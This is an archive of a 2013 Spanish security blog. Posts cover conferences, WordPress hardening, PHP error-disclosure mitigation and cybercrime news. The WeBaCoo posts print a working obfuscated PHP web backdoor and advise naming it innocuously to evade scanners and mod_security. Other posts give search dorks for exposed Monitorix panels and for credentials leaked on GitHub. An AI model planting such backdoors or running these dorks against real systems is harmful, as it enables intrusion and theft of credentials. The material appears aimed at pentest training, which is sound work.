27 de diciembre de 2013

Google Hack: Buscando Monitorix

Hoy desde temprano, navegando por Internet me encontré con una nueva herramienta, por lo menos para mi, llamada Monitorix con algunas características gráficas a la hora de monitorear servidores. Lo interesante de todo esto es que tiene sus gráficos en reportes web y si está en la web es casi seguro que Google tenga indexado algunas URL's


Monitorix es una herramienta de monitorización de red que recoge periodicamente los datos del sistema y utiliza la interfaz web para mostrar la información en forma de gráficas, además permite monitorizar el rendimiento general del sistema y nos puede ser muy útil para detectar posibles anomalías en el sistema.

Monitorix es Software Libre licenciado bajo los términos de la licencia GNU/GPLv2, además utiliza las librerías RDDtool y es un script que se encuentra escrito en Perl.

Ahora que conocemos un poco más de Monitorix veamos que sabe Google de él:

inurl:"/monitorix-cgi/monitorix.cgi"


25 de diciembre de 2013

Feliz Navidad a todos


Hoy no vamos a hablar ni de hacking ni de programación, de eso vamos a tener todo un año más por delante. Hoy simplemente desearles a todos y cada uno de los geek que nos siguieron en Cacería de Spammers y en el regreso de El CoDiGo K que tengan una muy Feliz Navidad para ustedes y a los que tengan la suerte de compartirlo con familia y amigos.

Felicidades! Saludos!

23 de diciembre de 2013

The Debian Administrator's Handbook


Cada vez que alguien menciona esta obra, no puedo evitar retroceder el tiempo en mis inicios como SysAdmin, comenzando por la administración de algunos firewalls basados en iptables y un correo en Postfix, para luego continuar administrando Proxy, LAMP, Bind9, VPN  y básicamente todo lo que un Administrador tiene a cargo sobre servidores Debian.

Sin dudas este proyecto me ayudó mucho a crecer profesionalmente, aprendiendo y comprendiendo los fundamentos de muchos de sus servicios, actualizaciones de Debian, el proceso de instalación de hardenización de un servidor, configuración, etc.

The Debian Administrator's Handbook es un proyecto escrito por dos Debian Developers Raphaël Hertzog and Roland Mas, sin duda uno de los recursos más valiosos para aquellos usuarios que utilizan Debian o distribuciones basadas en él.

No dejen de colaborar con este proyecto, ya sea difundiendo su contenido o colaborando económicamente para recaudar fondos para seguir con nuevas edisiones.

Saludos!

Enlace | The Debian Administrator's Handbook

20 de diciembre de 2013

Historia de los buffer overflows - Parte 1

Hoy les quería compartir un Hangouts de Juan Sacco @juansacco, creador del proyecto OpenSource llamado Exploit Pack donde nos cuenta un poco de la historia y los inicios de los fallos Buffer Overflow en esta primera parte.


Saludos!

Enlace | Presentación de Historia de los buffer overflows

17 de diciembre de 2013

Como crear un Backdoor con WeBaCoo (2 de 2)


Segunda y última parte de esta entrega, y la idea de hoy es en primer lugar crear nuestro backdoor con WeBaCoo y lograr comprometer un servidor, para evitar meternos en problemas vamos a utilizar DVWA y en particular su fallo en el menu de Upload.

Para evitar llamar la atención en los escaneadores de archivos e incluso en el mismo mod_security, les recomiendo que utilicen un nombre para su backdoor que no haga alusión a que es un backdoor sino un archivo más.

$ ./webacoo.pl -g -f 1 -o consulta.php

        WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
        Copyright (C) 2011-2012 Anestis Bechtsoudis
        { @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }

[+] Backdoor file "consulta.php" created.

Por defecto el código queda ofuscado, pero tenemos la opción con -r de no ofuscarlo al momento de generarlo.

$ cat consulta.php
<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>

16 de diciembre de 2013

Actualización WordPress 3.8


Por estos últimos días, se liberó una nueva actualización del CMS más popular de la web, WordPress 3.8 “Parker”, la misma incorpora todas las actualizaciones anteriores como la 3.7 y 3.7.1

Todas las mejoras para esta nueva versión son a nivel de experiencia de usuario y hasta el momento no se dio detalle sobre fallos de seguridad, es posible en el correr de los días se publiquen algunos documentos al respecto.

La verdad que estuve trabajando todo el fin de semana con esta nueva versión, donde le da un giro 360º al panel de administración, nuevos estilos, responsive designer, nueva administración de themes y varias cosas más que estoy seguro que van a percibir aquellos usuarios que vienen trabajando con WordPress.



Por otro lado #WPHardening es totalmente compatible con WordPress 3.8 así que les recomiendo implementarlo para cerrar y fortificar su proyecto antes de enviarlo a producción o subirlo al web hosting.

Desde ya es recomendable actualizar a esta nueva versión por posibles problemas de seguridad futuros y además para tener y disfrutar de esta nueva versión 100% libre.

Saludos!

Enlace | WordPress 3.8

13 de diciembre de 2013

A&D Security Conference 2013 - Día 2 en Vivo


Live streaming video by Ustream

09:00 AM

Registración

09:30 AM

Bienvenida

09:40 AM

La Ética del Hacker Valentin Muro

10:00 AM

Auditorio 1 - Conociendo Huemul distro para informatica Forense Marcos Russo/Vampii/Gonzalo Zaccardi
Aula 1 - OpenTalks
Aula 2 - OpenTalks

10:45 AM

Auditorio 1 - Pivoting in Amazon clouds Andres Riancho
Aula 1 - OpenTalks
Aula 2 - OpenTalks

11:30 AM

Break

11:45 AM

Auditorio 1 - Uso de la Ingeniería Inversa de código en la detección de vulnerabilidades Eugenia Bahit
Aula 1 - TULZ - w3af Andres Riancho
Aula 2 - TULZ - PC táctil Daniel Dieser

12:30 PM 

Auditorio 1 - Brazilian cybercrime underground: Modus Operandi Ronaldo Lima/Aline Bueno
Aula 1 - TULZ - Secure TDD Carlos Pantelides
Aula 2 - TULZ - vScan Federico Massa

13:15 PM 

Almuerzo

14:30 PM 

Auditorio 1 - Hacking RFID Babak Javadi
Aula 1 - OpenTalks
Aula 2 - OpenTalks

15:15 PM 

Auditorio 1 - Temas avanzados de Rootkits Marcos Schejtman
Aula 1 - OpenTalks
Aula 2 - OpenTalks

16:00 PM 

Break

16:15 PM 

Hackers University: Out of The Matrix Fede Pacheco

16:45 PM 

Desde Dig a la Destrucción de RSA Cristian Amicelli

17:45 PM 

Cierre / Sorteos / Show

18:30 PM 

Fin Día 2

12 de diciembre de 2013

A&D Security Conference 2013 - Día 1 en Vivo

Live streaming video by Ustream

09:00 AM

Registración

09:45 AM

Bienvenida

10:00 AM

Los límites éticos y legales que no podés cruzar en una investigación, o sí Sebastian Bortnik

10:30 AM

Hacking Router's with FeeeBSD Alexis Sarghel / Diego Gutierrez

11:15 AM

Openpgp y HTTP: Alta fiesta? Buanzo 

12:00 AM

Break

12:15 PM 

Auditorio 1 - Workshop Fail2ban Buanzo
Auditorio 2 - Workshop Cryptography 101 Paulo Veloso

13:15 PM 

Almuerzo

14:30 PM 

Auditorio 1 - Workshop Lockpicking Babak Javadi
Auditorio 2 - Workshop Your brain, my treasure... Michael Hudson

15:30 PM 

Break

15:45 PM 

Life as a Cracker, mitos y verdades Alberto Ferrer / David de Asis

16:30 PM 

The CSO Myopia Jordan Bonagura

17:15 PM 

Facebook Hacking Tool Gustavo Ogawa

18:15 PM 

Cierre

18:30 PM 

Fin Día 1

9 de diciembre de 2013

#SPAM, no es solo un correo basura

Les quiero dejar una referencia de todos o por lo menos algunos de los factores que podemos encontrar detrás de un simple #SPAM, la idea es ver cada uno de los componentes que intervienen en este negocio rentable y que a día de hoy seguimos padeciendo todos.

La forma del SPAM



Evidentemente el SPAM siempre va a estar disfrazado de cosas que se encuentran instauradas en la actualidad, temas populares, los que se encuentra en boca de todos, recuerden que la idea es siempre enganchar al usuario (víctima) para que ingrese a algún lado, complete información, revele datos, clicke en algo, etc.

WhatsApp sin duda es un servicio que tenemos muchos y es una poderosa marca para motivarnos a la acción dentro del correo electrónico.

Pensando en voz alta


Realmente no creo que una empresa como WhatsApp, con el caudal de usuarios y el poder financiero, tenga el descuido de elaborar en su emailmarketing un correo tan pobre en contenido (horrible) y su envío sea desde una cuenta cuyo dominio no es whatsapp.com

Les voy a ahorrar el camino, comentando que clicke en “autoplay” algo que realmente recomiendo no hacer. Un redireccionamiento de IP y dominio, algo que vamos a contar unos párrafos más abajo, y sorpresa! Todo este circo armado para entrar a comprar una página de Viagra, de todo tipo de color, forma y poder sexual.


4 de diciembre de 2013

The Original Hacker Nº 2


Ya se encuentra disponible el segundo número de la revista digital The Original Hacker creada por nuestra amiga Eugenia Bahit, y en este número se encuentran varios temas de lo más interesante:

  • Ingeniería Inversa: Desarrollar Software Aplicando la Ingeniería Inversa
  • Python Scripting: Manipular Archivos de Configuración Mediante ConfigParser
  • Ingeniería de Software: Agregado de archivos cron y ejecución periódica de procesos en los paquetes .deb
  • Europio Engine Lab: ¿cómo se hicieron los ABM de la Web "The Original Hacker Library"?
  • Seguridad Informática: Capas de Seguridad Inteligentes en PHP – Saneamiento del array superglobal $_POST

Sin dudas, 36 hojas para llevar a todas partes y aprovechar al máximo sus contenidos.

Saludos!

2 de diciembre de 2013

A&D Security Conference 2013


Este 12 y 13 de Diciembre, en la ciudad de Buenos Aires no se pueden perder de A&D Security Conference, una conferencia joven creada con el objetivo de reunir diferentes aspectos de seguridad de la información, desde una visión Ofensiva y Defensiva.

Durante el evento Profesionales de la industria hablarán sobre temas de interés y relevancia para la comunidad, siendo útil para cualquiera sea la mirada del asistente.

2 días de pura acción Hacker para cerrar el año, A&D va a contar con conferencias en simultáneo, Wargame, OpenTalks, Workshop, Desafíos forenses y la demostración de algunas herramientas de seguridad.

Para esta edición estará presente Arturo Buanzo (@buanzo), Gustavo Ogawa (@chinoogawa), Andres Riancho (@w3af), Eugenia Bahit (@eugeniabahit), Fede Pacheco (@FedeQuark) y muchos más conferencistas acompañado de toda la comunidad Hacker.

Agenda



A&D es un evento totalmente gratuito y los dos días se van a transmitir por audio-video streaming, seguramente lo vamos a estar publicando esos mismos días.

Desde ya un gran saludo para los organizadores Matias Katz, Maxi Soler, Cristian Amicelli, Nicolas Ogawa y Soledad Quijano

Saludos!

Enlace | A&D Security Conference@andseccon

1 de diciembre de 2013

15 años de SQL Injection

En esta conferencia en la Escuela Universitaria de Informática de la Universidad Politécnica de Madrid, Chema Alonso, un una divertida charla, nos cuenta sobre la historia y la evolución de las técnicas de SQL Injection.

A disfrutar.


Saludos!

26 de noviembre de 2013

Linux Forensics en Crimen Digital


Para aquellas personas que a día de hoy no conocen el Podcast de Crimen Digital, un Podcast de Cómputo Forense, Seguridad en Internet y todo lo relacionado con el Cibercrimen conducido por Andrés Velázquez.

Les quería compartir este episodio número 60 y además un programa dedicado a hablar de Linux en las Investigaciones digitales.

Un nuevo capítulo más imperdible para aquellos que desean afrontar nuevos desafíos en la línea de la investigación digital.


Andrés Velázquez

Ingeniero Cibernético con vocación de Abogado, inició haciendo investigaciones de delitos informáticos por el mismo destino después de pasar un par de años en el área de seguridad de la información en varias empresas. Como un buen workaholic trabaja en buscar las pruebas digitales para encontrar a los responsables de un fraude, una amenaza o cualquier otra situación donde esté involucrada la tecnología. En este proceso, creó la idea del podcast Crimen Digital para promover la prevención de los delitos informáticos en América Latina.

Enlace | Crimen Digital episodio 60

25 de noviembre de 2013

Como crear un Backdoor con WeBaCoo (1 de 2)

WeBaCoo

La idea de estos artículos es entender algunos conceptos y rápidamente ponerlos en práctica, haciendo uso de algunas herramientas para plantar nuestra bandera en las auditorios y pentesting que realicemos, en otras palabras es una buena forma de consolidar nuestro acceso y tomar control del servidor.

Antes les propongo conocer un poco más sobre los Backdoors, Wikipedia nos propone el siguiente concepto:

"En la informática, una puerta trasera (o en inglés backdoor), en un sistema informático es una secuencia especial dentro del código de programación, mediante la cual se pueden evitar los sistemas de seguridad del algoritmo (autentificación) para acceder al sistema. Aunque estas puertas pueden ser utilizadas para fines maliciosos y espionaje no siempre son un error, pueden haber sido diseñadas con la intención de tener una entrada secreta."

Ahora bien, conociendo este concepto y dada una cantidad de factores a nuestro favor, nosotros podríamos llegar a crear un backdoor para tener acceso en todo momento.

UN DATO CURIOSO


En el 90% de los defacement en sitios webs, sus atacantes dejan una puerta trasera creadas con algún scripts PHP Shell como c99Shell, r57shell o alguno similar, detectable por algun analizador de Log en el Servidor Web y subida al servidor por algún fallo en los permisos de un directorio, Remot File Include o una mala administración de las cuentas de usuarios administradores del sitio.

Desde hace tiempo, utilizo una herramienta para crear Backdoor en PHP llamada WeBaCoo.

21 de noviembre de 2013

El Grooming ya es ley en Argentina


Este es un muy buen artículo que leí esta mañana en el diario Clarin.com y quería compartirlo con todos ustedes.

Condena con prisión de 6 meses a 4 años a quien atente contra la integridad sexual de un menor. Recomendaciones para que los chicos usen con seguridad la Red.

El ciberacoso en nuestro código penal ya es ley. Esto significa que una nueva figura delictiva se ha convertido en un tipo penal punible. Lo que posibilitará eventualmente condenar las conductas que tengan lugar cuando una persona se ponga en contacto por medios electrónicos con un menor de edad con el fin de cometer cualquier delito contra su integridad sexual. 

El crecimiento de los últimos años del uso de al redes sociales y su aprovechamiento por parte de quienes delinquen por intermedio de ellas, en especial en la captura de la confianza de los menores, es una práctica que ha venido en aumento y así lo demuestra la cantidad de casos registrados y conocidos en los últimos tiempos. Desde ahora contamos con una figura que se encontraba pendiente que esperamos que facilite la persecución, investigación y condena sobre estas acciones aberrantes.

En la anterior reforma del código del año 2008, se incorporaron nuevas figuras que tenían como medio el uso de tecnologías de comunicación para la consecución de diferentes acciones penadas, como ser la distribución, comercialización, facilitación o  producción de material de pornografía infantil, el acceso indebido a sistemas electrónicos, la alteración de datos o su destrucción, la privacidad de los correos, entre otras. Todas ellas quedaron como parte de nuestra legislación penal. El denominado grooming había quedado fuera hasta la semana pasada.

19 de noviembre de 2013

Chema Alonso, Hacker y Emprendedor

Desde hace un par de años que estoy con el rollo de la Seguridad Informática he tenido la suerte de contactarme con un icono en la materia y que no es ni más ni menos que el español Chema Alonso, de el que ya escribimos en varios post.

En este video que les quería compartir comenta un poco más sobre sus inicios, como comenzó sus primeros pasos como Hacker y luego emprendedor.

Amigos que lo disfruten!


Saludos!

No se olviden de seguir a Chema en su cuenta de Twitter y en su Blog.

18 de noviembre de 2013

Clasificación parcial en los premios #Bitacoras2013


Según el últimos listado en las clasificaciones parciales de los premios Bitacoras.com 2013 Cacería de Spammers quedó en el puesto Nº 47 logrando así el objetivo de estar entre los 50 mejores blogs de Seguridad Informática y todo es gracias a todos sus votos.

Algunos creerán que es poco y otro no tanto, la verdad que es un privilegio estar en esa lista y que todos y cada uno de ustedes hayan dejado un voto de confianza a este proyecto que recién esta en crecimiento. Ahora vamos a ir por más, intentando publicar mucho más contenido, dejando más valor para todos y buscando ambiciosamente más reconocimiento.

No me queda más que darle las gracias, el listado con los 10 blogs más votas, todos de un altísimo valor en conocimiento y unos profesionales en la Seguridad Informática de primera.

  1. El Blog De Angelucho
  2. El Lado Del Mal
  3. Security By Default
  4. Hacktimes V2.0
  5. Hack Players
  6. Hacking Ético
  7. Flu Project «
  8. Hacking Ètic
  9. Blackploit [Pentest]
  10. Underc0De Blog - Hacking Ético

Que gane el mejor! Saludos!

14 de noviembre de 2013

Guía S.O.S. contra el ciberacoso


Podemos aceptar que se degraden los servicios de una compañía o que se comprometan una gran cantidad de información de gobiernos, que grupos como Anonymous se manifieste con DDoS y hasta incluso un secuestro de DNS, pero lo que no debemos aceptar es que los delincuentes se metan con los más vulnerables, que son los niños.

Por desgracia, el acoso a través de Internet es una realidad. El ciberacoso o ciberbullying entre menores es uno de los problemas que están ganando peso en la sociedad actual. El correo electrónico, las redes sociales y los programas de mensajería instantánea del ordenador y del móvil son las vías más frecuentes para realizarlo.

La gente de INTECO en su labor de colaborar con la Agenda Digital para España, deja a nuestra disposición 3 guías S.O.S. sobre estos temas.

Se trata de guías de primeros auxilios que pueden ayudar a los padres y educadores a conocer los indicios para detectar un caso de ciberbullying o de grooming, cuáles son los pasos a dar para solucionarlo y todos los agentes que están dispuestos a colaborar para ello. Además, es de gran importancia que también conozcan las formas de prevención y de educación que es imprescindible poner en marcha en el momento en el que los menores entran en contacto con la tecnología.

11 de noviembre de 2013

Como evitar un Full Path Disclosure en PHP


Hace un tiempo vimos de que se trataba una vulnerabilidad de tipo Full Path Disclosure, hoy les quería dejar tres alternativas para poder mitigar este tipo de fallo, que como vimos, puede llegar a revelar información sobre la disposición de nuestros directorios, nombres de archivos, etc.

Evitar un FPD es tan simple como desactivar la visualización de los mensajes de errores. Claro está que este tipo de configuraciones son imprescindibles en los servidores de producción, ya que se supone que en una etapa previa de desarrollo fueron depuradas todas las funciones.

Si tenemos la posibilidad de configurar el archivo php.ini podemos utilizar la directiva display_errors

display_errors = 'off'

Si tenemos la posibilidad de editar nuestro archivo .htaccess podemos escribir la siguiente directiva

php_flag display_errors off

Finalmente, podemos setear no visualizar los mensajes de error en tiempo de ejecución desde el mismo script escrito en PHP haciendo uso de la función init_set()

init_set('display_errors', false);

De esta manera, la idea es limitar por los diferentes medio la exposición de información por un simple error en tiempo de ejecución que revela información de nuestra estructura de directorios y archivos.

A poner en práctica estos consejos y espero todos sus comentarios y consultas.

Saludos!

7 de noviembre de 2013

Recta final para los premios Bitacoras

Este es el primer año que participo en estos premios Bitacoras.com 2013 ya verdad estoy muy feliz de todos y cada uno de los votos obtenidos, les puedo asegurar que es un privilegio estar en esa lista acompañando a tantos colegas y profesionales de la Seguridad Informática como es el caso de los chicos de Security By Default, HackPlayer, el blog de Angelucho, Chema Alonso, Flu Project, Blackploit, Inseguros, Seguridad a lo Jabalí, etc.

Todos excelentes profesionales y con un reconocimiento extraordinario en los blogs, es por ello que mi objetivo para este año es estar entre los 50 mejores, como les comentaba, estar en esa lista para mi es realmente reconfortante, pero siempre hay que ir un poco más adelante y me idea es estar presente entre los 50.

Votar en los Premios Bitacoras.com

Nuevamente gracias a todos los que están votando, a seguir apoyando a los blogs que más les gusta de todas las categorías y les pido un par de votos más para cumplir mi objetivo.

Muchas Gracias!

5 de noviembre de 2013

The Original Hacker - jugando con la inteligencia

Hoy es el lanzamiento de la revista digital The Original Hacker creada por mi amiga Eugenia Bahit con el objetivo de lograr un compilado de información para profesionales a los que realmente les apasiona su carrera; para quienes verdaderamente disfruten jugando con la inteligencia, más allá de la tecnología.


La propuesta es abarcar, al menos, los siguientes 5 temas en cada una de las ediciones mensuales:

  • Shell Scripting: con mayor énfasis en Python y en Bash, pero experimentando también con otros lenguajes;
  • Seguridad informática: basada no solo en seguridad de aplicaciones en capas a nivel de código, sino también, en protección a nivel sistema;
  • Ingeniería tradicional de Software: abarcando las técnicas y prácticas más avanzadas de la ingeniería de Software, aplicadas en Python y PHP;
  • Ingeniería Inversa: haciendo hincapié más que nada en los procesos de razonamiento implementados en la Ingeniería Inversa aplicada al desarrollo de Software;
  • Taller de desarrollo y laboratorio con Europio Engine;

Saludos!

Enlace | OriginalHacker.org
Descarga | The Original hacker Nº 1

4 de noviembre de 2013

#GitHub Hacking: conexiones MySQL

Volviendo a jugar con la caja de sorpresas de GitHub, les quería dejar una nueva cadena de búsqueda para GitHub que les va a sorprender.

Antes de comenzar a utilizar los framework de PHP, en particular Symfony fue el que siempre me gustó de la cantidad de alternativas conocidas, uno como programador buscaba la forma de programar lo más escalable posible, con el afán de establecer una conexión con MySQL, díganme quién no utilizó alguna vez la función mysql_connect();

Bueno, eso es justamente lo que vamos a buscar en GitHub.

mysql_connect('localhost', *)



y nos damos con que hay más de 40.000 códigos de proyectos que publican la forma en como se conectan con su servidor de base de datos, tampoco hay que ser muy adivino para saber cuáles son los argumentos de la función mysql_connect() que son server, username y password.

Para sorpresa mía, en la documentación oficial de PHP, nos dice que esta función está obsoleta a partir de PHP 5.5.0 y se eliminará en un futuro. Las nuevas alternativas son mysqli_connect() y PDO::__construct() 

31 de octubre de 2013

Videos y presentaciones de la Ekoparty 2013


Ya se encuentran disponible muchos de los videos y las presentaciones de la Ekoparty 2013, el evento de seguridad más importante en latino américa.

Como cada año, Ekoparty nos sorprende con conferencistas expertos en su materia, como es el caso de Chema Alonso, Fede Pacheco, Sebastián García, Corey Kallenberg, etc.

Desde ya les recomiendo todas y cada una de las presentaciones disponibles.

Saludos!

Enlace | Videos y presentaciones Ekoparty 2013

28 de octubre de 2013

Atacando IPv6 con Evil Foca

En la última Ekoparty, Chema Alonso nos dejo un par de demos mostrando varias formas de atacar el protocolo IPv6 con la herramienta Evil Foca, explicando los conceptos y el porque de cada uno de estos fallos.

Para qué seguir comentando si tenemos la posibilidad de ver el video.


11 Alonso from ekoparty on Vimeo.

Saludos!

21 de octubre de 2013

Seguridad Informática con Software Libre

Este es el nombre de la charla que voy a estar dando junto a mi amigo Jorge Riera el Martes 29 de Octubre, de 16hs a 18hs en el Aula Virtual de la Facultad de Ingeniería, San Salvador de Jujuy – Argentina.

Desde ya muy agradecido a todo el equipo de Tecnomati.co la nueva Cooperativa Informática, por su invitación a participar del evento que es totalmente gratuito y a beneficio de la Escuela Primaria Rural Nº313, “Constancio Vigil” de San Pedro de Jujuy y de una Escuela de la Puna Jujeña.

Si bien la entrada es totalmente gratuita, necesitamos que nos ayude con un alimento no perecedero,  ropa, calzado, útiles. Ayudanos a ayudar.

Por otro lado la Cooperativa Informática Tecnomati.co se encuentra haciendo una gira por varias localidades de la Provincia dando charlas por San Pedro, La Quiaca y San Salvador de Jujuy.

Respecto a nuestra charla, “Seguridad Informática con Software Libre” vamos a intentar entrar en el  mundo de la Seguridad Web, algunas introducciones y comprender su actualidad. Le vamos a mostrar que es OWASP, para no meternos en problemas vamos a utilizar un entorno controlado DVWA y finalmente vamos a aprender algunas pruebas de conceptos en los fallos más populares.

Los esperamos! Saludos.

Enlace | Tecnomati.co

18 de octubre de 2013

Solo para programadores

Se termina la semana, muchas gracias anticipada por votar por Cacería de Spammers para los premios Bitacoras 2013 nominado a mejor blog de Seguridad Informática.

Despedimos la semana con un poco de humor solo para programadores


Recuerden, si no cumplen con todos estos principios, hay tabla

Saludos!

15 de octubre de 2013

5 recomendaciones si vas a instalar WordPress

La verdad que por estos tiempos, la popularidad de WordPress superó todas las fronteras de Internet, realmente es incalculable la cantidad de sitios que utilizan este gestor de contenidos para administrar y manejarse en la web.

Estoy seguro que su gran popularidad alcanzada esta dada por su simpleza, escalabilidad, extensión, compromiso con sus usuarios y toda su comunidad.

En este breve artículo, quería recomendar 5 cosas que deberían hacer si van a instalar WordPress en un servidor de Producción.

  1. Descargar la última versión estable de WordPress de su sitio oficial, actualmente lo podemos encontramos en muchos  idiomas.
  2. No utilicen Plugins que se encuentran desatendidos o desactualizados, nos pueden dar muchos dolores de cabeza a lo largo del tiempo y pueden ser incompatibles con nuevas versiones.
  3. Eliminen aquellos archivos que WordPress no necesita para ser ejecutado.
  4. No dejen absolutamente nada de sus configuraciones por defecto, wp-config, permisos en directorios, contraseñas, usuarios, etc. es mejor tomarse el tiempo y revisar todas las configuraciones, no solamente la primera vez, sino que sea un hábito de revisión.
  5. Respecto a los Themes que van a usar, verifiquen los trabajos que tiene su diseñador, las recomendaciones que hay en Internet sobre ese estilo, intenten leer su código fuente en búsqueda de malware o de ofuscación de código, consulten en foros o a gente que conoce del tema.

Todo esto de ninguna manera garantiza la seguridad en su sitio, lo que si les aseguro que van a ir disminuyendo los posibles vectores de ataques que puede sufrir su web.

Por otro lado, tomen esto como un ejercicio diario, un verdadero trabajo profesional que requiere ser visto y mantenido periódicamente.

Saludos!

1 de octubre de 2013

JUCSE 2013 - Seguridad en Infraestructura Web

A unos días de organizarse la Vigesimoprimeras Jornadas Universitarias sobre Computación de Santiago del Estero JUCSE 2013, en esta edición presentando como tópico general, Seguridad en Infraestructura Web.

Este Jueves 3 y Viernes 4 de Octubre se va a realizar en Santiago del Estero las JUCSE 2013, por otro lado, esta edición de las jornadas será transmitida a través del sistema de video-conferencia  HD en las sedes universitarias de Jujuy  Rafaela.

Aunque el año pasado estuvimos en Santiago del Estero junto a Francisco J. Capdevila, este año lo más seguro es que asista de forma on-line en la sede de Jujuy.


El programa es el siguiente:

JUEVES 3

08:00 a 08:30 Acreditaciones
08:30 a 12:30 Curso: "Seguridad en Infraestructura"
17:00 a 19:00 Curso: "Seguridad en Infraestructura"
19:30 a 21:30 Curso: "Seguridad de Aplicaciones Web"

VIERNES 4

08:00 a 12:30 Curso: "Seguridad en Aplicaciones Web"
17:00 a 21:00 Curso: "Alta Disponibilidad"


28 de septiembre de 2013

Premios Bitacoras 2013

Arrancó una nueva edición de los Premios Bitacoras 2013 y para esta oportunidad estoy buscando tu colaboración, si crees que los contenidos de Cacería de Spammers fueron lo suficientemente buenos, dame una mano y dejarnos tu voto en la categoría de Blogs de Seguridad Informática.

Votar en los Premios Bitacoras.com

Desde ya, muchas gracias por tu colaboración.

Saludos!

24 de septiembre de 2013

Por qué recomiendo crear HOWTO y publicarlos

Todos en algún momento, los que nos dedicamos a la administración de Servidores y la Seguridad, generalmente vivimos leyendo, a diario, además de noticias, tutoriales, webcast, papers y howto de como un problema puede ser resuelto utilizando alguna herramienta, como hacer hardening de un sistema, como configurarlo, optimizarlo, etc.

El hecho de recomendar la creación de HOWTO y publicarlos, es un principio básico de todos, en primer lugar la falta de memoria que con el paso del tiempo tenemos todos y que cuando queremos volver a reproducir aquellos que hicimos tenemos que recopilar nuevamente toda la información, por otro lado, crear un Howto nos ayuda a entender todos los temas en su profundidad y ver aquellos detalles que para nosotros puede ser algo habitual pero para un documento no lo es.

Por otro lado publicando nuestros Howto y compartiéndolo en cualquier formato, estoy más que seguro que vamos a estar colaborando con nuestros compañeros a solucionar su problema particular, e indirectamente vamos a estar promocionando nuestra marca personal, demostrando nuestras cualidades, conocimientos y aptitudes.

Por esta razón, los Howto no solo nos sirve a nosotros mismos para refrescar un conocimiento ya adquirido sino también a todas aquellas personas con esa misma problemática.

Un muy buen sitio para ver muchos Howto es http://howtoforge.com donde van a encontrar todos los COMO para el universo de los servidores GNU/Linux.

Por eso los animo a todos a crear sus propios Howto sobre cualquier tema que con un poco de difusión y buena redacción va a quedar en la memoria de muchos.

Saludos!

18 de septiembre de 2013

Yo uso GNU

Voy a intentar responder en algunas líneas, una pregunta que frecuentemente recibo de colegas y gente que conozco, y que generalmente les llama la atención cuando les comento que yo solamente uso GNU/Linux.

Lo primero que les voy a comentar es que gracias a mi gran amigo Luis Wayar, quien supo transmitir el espíritu Hacker de aprender, un verdadero activista del Software Libre, me lo presentó por el 2003 y desde allí no utilicé otra cosa más que GNU/Linux.

Las razones son realmente muchas, estoy muy de acuerdo con la filosofía del Software Libre, me gusta la idea de colaborar y utilizar software de otras personas, dar reconocimiento a aquellos que se esmeraron en obtenerla, sin dudas es un sistema muy meritocrático que impulsa a la innovación, cooperativismo, etc.

Por otro lado, 10 años más tarde, me encuentro que GNU/Linux y toda las herramientas que se encuentran acompañándolo, hoy son herramientas diarias de trabajo, por lo cuál se convierte en una razón más para seguir utilizándolo.

Las vuelta de la vida me encontró como Administrador de Redes y más adelantes en áreas de Seguridad Informática, y sin duda GNU/Linux se sigue adecuando a cada necesidad que a día de hoy utilizo, integrando servicios, monitoreo de servidores y ni hablar la cantidad de herramientas de seguridad que encontramos.

16 de septiembre de 2013

Detuvieron a un Joven ¿Hacker?

Esta es una de las noticias que este último fin de semana se vivió en #Argentina, la detención de un menor de 19 años, que para mi entender de Hacker no tenía nada, acusado de fraude electrónico por desviar pagos por Internet a otras cuentas.


Últimamente el término “hacker” por estos días, esta muy prostituido, los medios de comunicación utilizan estas palabras para causar algo de ruido, sin duda lo de este joven no es más que, un delincuente informático, el espíritu “hacker” no tiene nada que ver con esto que paso.

Saludos, Hackers!

3 de septiembre de 2013

#GitHub Hacking: Your password is ...

Comenzamos a publicar algunas de las cosas interesante que GitHub y sus usuarios dejan para que cualquier persona los pueda encontrar, en muchos cosas se encuentran proyectos que no deberían ser públicos, archivos que no tendrían que estar en los repositorios, información en los códigos fuentes o comentarios que se podrían evitar.


La idea es encontrarlos, advertirlos, exponerlos, buscar métodos para que esto no pase, divertirnos un poco y por sobre todas las cosas aprender no solo de nuestros propios errores sino ayudando a los demás.

Antes de comenzar a publicar algunos repositorios con archivos de configuración, intentar crackear password en MD5 o SHA1 le pedimos a GitHub que nos encuentre todos aquellos archivos de extensión log con la clásica frase: “your password is

La cadena final para buscarlos sería la siguiente:

"your password is" extension:log

https://github.com/search?l=&p=1&q=%22your+password+is%22+extension%3Alog&ref=advsearch&type=Code

nos vamos hasta la sección de código ya que el operador extension funciona para todo lo que es búsqueda de código y vemos con qué nos encontramos:


Por otro lado encontramos ofuscada la contraseña XD


Ahora bien la pregunta es, como podemos resolver este problema de publicar archivos que quizás no deberían ser públicos, incluso no deberían estar en los repositorios.

Lo primero que vamos a hacer en todo proyecto es analizar cuál es el contenido y los archivos que voy a estar subiendo, busqué las extensiones log por que generalmente se encuentran registrada los chat o mensajes de los mismos sistemas que por lo general crecen indefinidamente y podemos encontrar de todo. ¿Es necesario publicar un log en un repositorio público? Si la respuesta es NO entonces la clave está en configurar o crear el archivo .gitignore algo que GitHub está promoviendo para que los usen y especificar la siguiente línea

$ vim .gitignore
# File Logs
*.log

guardar ese archivo y el proximo commits que realicemos va a ignorar todos aquellos archivos que cumplan con esa condición, con esto vamos a tener en repositorio local la bitácora completa del archivo pero no lo vamos a subir a GitHub.

Simple? Rápido? Entonces a poner en práctica.

Saludos!

28 de agosto de 2013

Operadores para GitHub Hacking


La idea de hoy es conocer un poco más de cerca los operadores para componer algunas cadenas de búsqueda en GitHub.

Una de las cosas más interesantes en GitHub es que gracias a su API podemos crear y concatenar nuestras propias URL con búsquedas para que GitHub las interprete y nos brinde los resultados, esto con la práctica lo vamos a ver un poco más adelante.

